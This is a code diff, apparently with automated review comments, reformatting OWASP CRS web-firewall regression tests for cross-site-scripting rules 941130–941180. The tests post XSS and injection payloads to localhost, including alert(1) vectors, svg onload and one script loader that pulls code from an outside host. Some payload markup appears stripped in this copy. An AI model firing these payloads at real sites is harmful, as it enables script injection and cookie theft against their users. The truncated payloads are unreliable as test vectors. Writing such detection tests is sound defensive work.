extractvalue(xmltype('%cgger;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-5 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=abcd'||(select extractvalue(xmltype('%cgger;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 5 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" 
- data: "var=" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-6 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 6 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('%grorj;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('%grorj;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 7 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=afa" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-8 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=afa" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 8 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=chj" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-9 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=chj" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 9 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=/content.ini'||(select extractvalue(xmltype('%dwusu;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-10 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=/content.ini'||(select extractvalue(xmltype('%dwusu;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 10 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=EmptyValue'||(select extractvalue(xmltype('%awpsd;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-11 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=EmptyValue'||(select extractvalue(xmltype('%awpsd;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 11 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=file:/boot.ini'||(select extractvalue(xmltype('%cwtpc;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-12 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=file:/boot.ini'||(select extractvalue(xmltype('%cwtpc;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 12 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=Matched Data: %awfke;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-13 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=Matched Data: %awfke;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 13 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=oez" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-14 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=oez" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 14 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=(select extractvalue(xmltype('%anwyn;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-15 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=(select extractvalue(xmltype('%anwyn;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 15 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test 
agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-16 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 16 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=2010-01-01'||(select extractvalue(xmltype('%fhklu;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-17 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=2010-01-01'||(select extractvalue(xmltype('%fhklu;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 17 desc: "FP test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post/api/v1/query?q=7XMLNS" - version: HTTP/1.0 - output: - no_log_contains: id "941130" - - test_title: 941130-18 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post/api/v1/query?q=7XMLNS" + version: HTTP/1.0 + output: + no_log_contains: id "941130" + - test_id: 18 desc: "XSS test with encoded newline for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=chj" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-19 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=chj" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 19 desc: "Status Test Page - simple test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - headers: - Host: localhost - User-Agent: "foo!ENTITY % bar SYSTEM" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "941130" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + headers: + Host: localhost + User-Agent: "foo!ENTITY % bar SYSTEM" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "941130" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml index 6f0599b13..104001d42 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml 
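Review bot: With `test_title: 941130-N` removed, the per-test `desc` is the only human-readable label left, and tests 2 through 16 all carry the identical `desc: "XSS test for 941130"`, which makes a failing test hard to place from runner output. Each should name its vector, e.g. `desc: "941130: extractvalue/xmltype entity reference in POST arg"` for test 2. As shown here, tests 5 and 15 both send `data: "var="` and tests 8 and 18 both send `data: "var=chj"` while expecting a hit; either the payloads lost their markup in this copy (markup is missing elsewhere in the patch too) or these are duplicates, so confirm against the file before relying on them. The hunk is self-contained.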
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml
@@ -1,74 +1,69 @@
---
meta:
author: "zmallen, azurit"
- enabled: true
- name: "941140.yaml"
description: "Tests to trigger, or not trigger 941130"
+rule_id: 941140
tests:
- - test_title: 941140-1
+ - test_id: 1
desc: XSS vectors making use of javascript uri and tags, e.g.,

, in ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '9411400-1=%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E' - version: "HTTP/1.1" - output: - log_contains: id "941140" - - test_title: 941140-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '9411400-1=%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E' + version: "HTTP/1.1" + output: + log_contains: id "941140" + - test_id: 2 desc: XSS vectors making use of javascript uri and tags, e.g.,

, in ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' - version: "HTTP/1.1" - output: - log_contains: id "941140" - - test_title: 941140-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' + version: "HTTP/1.1" + output: + log_contains: id "941140" + - test_id: 3 desc: XSS vectors making use of javascript uri and tags, e.g.,

, in COOKIE stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941140" - - test_title: 941140-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941140" + - test_id: 4 desc: "Status Page Test - x=x:url(javascript as GET variable" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/bar?test=x%3Dx%3Aurl%28javascript" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941140" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/bar?test=x%3Dx%3Aurl%28javascript" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941140" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml index d68a05eea..03401b696 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml 
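Review bot: The meta `description: "Tests to trigger, or not trigger 941130"` names the wrong rule and is kept as context directly above the new `rule_id: 941140`; it should read `description: "Tests to trigger, or not trigger 941140"`. Minor: test 1 posts the parameter name `9411400-1` (extra zero); it is harmless for the match since the vector is the value, but `941140-1` keeps it consistent with the `941140-2` labels in tests 2 and 3. The `desc:` lines appear truncated in this copy (`e.g., , in ARGS`), so the example markup they cite should be checked after the move.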
@@ -1,41 +1,38 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941150.yaml" description: "Tests to trigger, or not trigger 941150" +rule_id: 941150 tests: - - test_title: 941150-1 + - test_id: 1 desc: Disallowed HTML entities, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941150-1%3D%3Ca%20href%3D%22test%22' - version: "HTTP/1.1" - output: - log_contains: id "941150" - - test_title: 941150-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941150-1%3D%3Ca%20href%3D%22test%22' + version: "HTTP/1.1" + output: + log_contains: id "941150" + - test_id: 2 desc: Disallowed HTML entities, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "payload=XSS" - version: "HTTP/1.1" - output: - log_contains: id "941150" + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "payload=XSS" + version: "HTTP/1.1" + output: + log_contains: id "941150" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml index 3259fd6d9..acbd0005e 100644 
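Review bot: With `test_title` removed, the two tests in this hunk are now distinguishable only by `test_id` and `desc`, yet both carry the identical `desc: Disallowed HTML entities, ARGS` although they send different bodies (test_id 1 an encoded `<a href="test"` fragment, test_id 2 a different `payload=` body), so a failure report for 941150-2 would not say which vector broke. Give each one a distinct description, e.g. `desc: Disallowed HTML entities, ARGS (url-encoded anchor tag)` for test_id 1 and one naming test_id 2's vector. Neither POST stage sets a `Content-Type`; if the runner does not inject `application/x-www-form-urlencoded` by default the body is never parsed into ARGS and the rule cannot fire — presumably it does, since these tests pass, but the 941310 tests later in this series set the header explicitly, which is the safer convention.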
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml 
@@ -1,267 +1,250 @@ --- meta: author: "csanders-git, Franziska Bühler, Walter Hop, Xhoenix, azurit" - enabled: true - name: "941160.yaml" description: "Tests to trigger, or not trigger 941160" +rule_id: 941160 tests: - - test_title: 941160-1 + - test_id: 1 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941160" - - test_title: 941160-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941160" + - test_id: 2 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: 
"HTTP/1.1" - output: - log_contains: id "941160" - - test_title: 941160-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941160" + - test_id: 3 desc: "just another XSS teststring: " - version: HTTP/1.0 - output: - log_contains: id "941160" - - test_title: 941160-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='\">" + version: HTTP/1.0 + output: + log_contains: id "941160" + - test_id: 15 desc: "SVG onload injection in filename" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php/%3Csvg/onload=alert()" - version: HTTP/1.0 - output: - log_contains: id "941160" - - test_title: 941160-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php/%3Csvg/onload=alert()" + version: HTTP/1.0 + output: + log_contains: id "941160" + - test_id: 16 desc: "Detect XSS injection of 'dialog' tag ('" - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + User-Agent: "OWASP CRS test 
agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "payload=javascript:/*-->" + version: "HTTP/1.1" + output: + log_contains: id "941170" + - test_id: 3 desc: 'Test first backslash match (javascript:(?:[\s\S]+[=\x5c\(\[\.<]) with: javascript: \\\\t (extra backslashes to work around rule transformations)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?var=javascript:%20%5C%5C%5C%5Ct" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?var=javascript:%20%5C%5C%5C%5Ct" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log_contains: id "941170" + - test_id: 4 desc: 'Test second backslash match (javascript:(?:...|\x5c[ux]\d)) with: javascript:\\\\u0020 (extra backslashes to work around rule transformations)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?var=javascript:%5C%5C%5C%5Cu0020" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-5 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?var=javascript:%5C%5C%5C%5Cu0020" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log_contains: id "941170" + - test_id: 5 desc: "Status Page Test - data: , as GET variable" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?test=%20data%3A%20%2C%20%3Cx%3E" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" + - input: + 
dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?test=%20data%3A%20%2C%20%3Cx%3E" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log_contains: id "941170" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml index ba33b770f..8761c2eb6 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml 
@@ -1,125 +1,117 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941180.yaml" description: "Tests to trigger, or not trigger 941180" +rule_id: 941180 tests: - - test_title: 941180-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941180-1=window.location' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-1=window.location' + version: "HTTP/1.1" + output: + log_contains: id "941180" + - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'document.cookie=941180-2' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'document.cookie=941180-2' + version: "HTTP/1.1" + output: + log_contains: id "941180" + - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: 
